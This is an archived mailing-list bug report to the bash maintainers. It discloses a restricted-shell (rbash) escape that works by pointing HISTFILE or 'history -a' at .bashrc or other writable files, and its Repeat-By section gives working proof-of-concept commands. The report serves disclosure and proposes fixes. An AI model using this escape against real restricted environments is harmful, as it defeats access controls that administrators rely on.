Path: csiph.com!xmission!news.snarked.org!news.linkpendium.com!news.linkpendium.com!panix!usenet.stanford.edu!not-for-mail From: Diffie Newsgroups: gnu.bash.bug Subject: Potential restricted bash escape by modifying history file Date: Thu, 30 Apr 2020 14:22:31 -0400 Lines: 54 Approved: bug-bash@gnu.org Message-ID: References: <1254402a-b6ad-4bb8-9831-7830b24c12f0@www.fastmail.com> NNTP-Posting-Host: lists.gnu.org Mime-Version: 1.0 Content-Type: text/plain X-Trace: usenet.stanford.edu 1588272529 31388 209.51.188.17 (30 Apr 2020 18:48:49 GMT) X-Complaints-To: action@cs.stanford.edu To: bug-bash@gnu.org Envelope-to: bug-bash@gnu.org DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=mm.st; h= mime-version:message-id:date:from:to:subject:content-type; s= fm3; bh=852X0AVM9ow0dK8n5qr/JBXkPaeL24Fvym7fmLxdBlg=; b=LkaQ9NLL dxRDgZxMzvu0iwqZhlAWwb0PcyEA212Ne4nC2aDZv6czu6IEc6w+E0BN8z4WE2SN Mihwo1iS7uXp1p9FtoX8KbI++FM9NDFNOSHkSa8g3K9wPZ5qP9KobJfdCCIktmUr prdXhJxOAgE2LrJUem/Z+YF4T07r8sjE8PGgL2EOvr82S7gVwblHH5rGkLRqWldJ ZGaBgiURxvkBrA+tJ8vjKe8OhYUUzfNYxeR4NP8GGejnjvG9bs4Sx2oS60VwW9f6 Xq+QmfOvEVKH7XU5zUBL6ST4WUYSZOXifCOCksqIDjsrMuvSN/XHMzAMeGGrSQQE RuD1RTGOYIXgNQ== DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d= messagingengine.com; h=content-type:date:from:message-id :mime-version:subject:to:x-me-proxy:x-me-proxy:x-me-sender :x-me-sender:x-sasl-enc; s=fm2; bh=852X0AVM9ow0dK8n5qr/JBXkPaeL2 4Fvym7fmLxdBlg=; b=fYZ757KlTK1ZL2B8i24T+MuEl8EkriVa5Acvhq3BkYy2H 89cdd7dypfITl79RNWeQJ/XKpQpIVBVBnBZf6AAK+jLBW4VZNOR3u8HytaZWaixB D/crkLPzJZEwUSDbg878N9zf9uoTz853rNRJG5cLcfwVHah1zcjEudC+4EKL5JbS sDA2ETZqx4TEuy3x6fOB54kLJuVPhB5Y8XdhD/UcjLoi/mSb67mxLivN0QqROktZ bjXtZ+eIQ0eNw3ZLIR9CHxycBz43NNf8qXvVKFmtfaTL0zQWVs9+ooDvbL6CxRkm hEKZ3+cMvU2CbARkUGjPlnW5KkhILgU4vCbVZMvLQ== X-ME-Sender: X-ME-Proxy-Cause: gggruggvucftvghtrhhoucdtuddrgeduhedrieehgdduvdefucetufdoteggodetrfdotf fvucfrrhhofhhilhgvmecuhfgrshhtofgrihhlpdfqfgfvpdfurfetoffkrfgpnffqhgen uceurghilhhouhhtmecufedttdenucenucfjughrpefofgggkfffhffvufgtsegrtderre erredtnecuhfhrohhmpeffihhffhhivgcuoehnrghnohesmhhmrdhstheqnecuggftrfgr thhtvghrnhepffevfeffjeduiedtheduvdehveektefhfeeikeeiieffheetudehgeduge ehveevnecuvehluhhsthgvrhfuihiivgeptdenucfrrghrrghmpehmrghilhhfrhhomhep nhgrnhhosehmmhdrshht X-ME-Proxy: X-Mailer: MessagingEngine.com Webmail Interface User-Agent: Cyrus-JMAP/3.3.0-dev0-351-g9981f4f-fmstable-20200421v1 Received-SPF: pass client-ip=64.147.123.25; envelope-from=nano@mm.st; helo=wout2-smtp.messagingengine.com X-detected-operating-system: by eggs.gnu.org: First seen = 2020/04/30 14:23:05 X-ACL-Warn: Detected OS = Linux 2.2.x-3.x [generic] [fuzzy] X-Received-From: 64.147.123.25 X-Mailman-Approved-At: Thu, 30 Apr 2020 14:48:47 -0400 X-Content-Filtered-By: Mailman/MimeDel 2.1.23 X-BeenThere: bug-bash@gnu.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: Bug reports for the GNU Bourne Again SHell List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-Mailman-Original-Message-ID: <1254402a-b6ad-4bb8-9831-7830b24c12f0@www.fastmail.com> Xref: csiph.com gnu.bash.bug:16257 Configuration Information [Automatically generated, do not change]: Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -Wno-parentheses -Wno-format-security uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux Machine Type: x86_64-redhat-linux-gnu Bash Version: 5.0 Patch Level: 11 Release Status: release *Description:* It is possible to write/append arbitrary content to files from a restricted bash shell (with the privileges of the current user context) by tweaking the HISTFILE variable, or by specifying a filename to "history -[a][w]". This does not necessarily lead to a restriction bypass in all configurations, but does in a few that come to mind: * If the user can write to their home directory they can append arbitrary code to .bashrc/other shell files. These shell files will execute the code without restrictions on subsequent runs of rbash (assuming rbash is not being run in posix mode, and that --norc is not being passed) * If the user is root they can trivially get an unrestricted shell by modifying /etc/passwd, etc. * If the cwd contains an executable script that the user can write to, they can append to the script with arbitrary code, then invoke this code from rbash: "hash -p executable_script mal_command ; mal_command" (this could be possible with an executable binary too, although would be a little more complex) * SSH authorized keys, various other configs. * etc... Again, it will depend on the configuration, but this seems exploitable in most configurations of rbash (one where it may be more difficult to exploit is when the user is placed into a non-home directory chroot where they have limited write access). *Repeat-By:* [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r [__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc [__RESTRICTED] bash-5.0$ history -c [__RESTRICTED] bash-5.0$ /usr/bin/whoami [__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command names [__RESTRICTED] bash-5.0$ history -a [__RESTRICTED] bash-5.0$ exit [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r diffie # whoami inserted into .bashrc above [__RESTRICTED] bash-5.0$ OR without using HISTFILE variable [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r [__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc ' > /usr/bin/whoami > ' [__RESTRICTED] bash-5.0$ exit [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r diffie [__RESTRICTED] bash-5.0$ *Fix: * * Disable writing to a specific file in rbash with "history -[a][w] /tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge cases here. * Disable history in rbash altogether.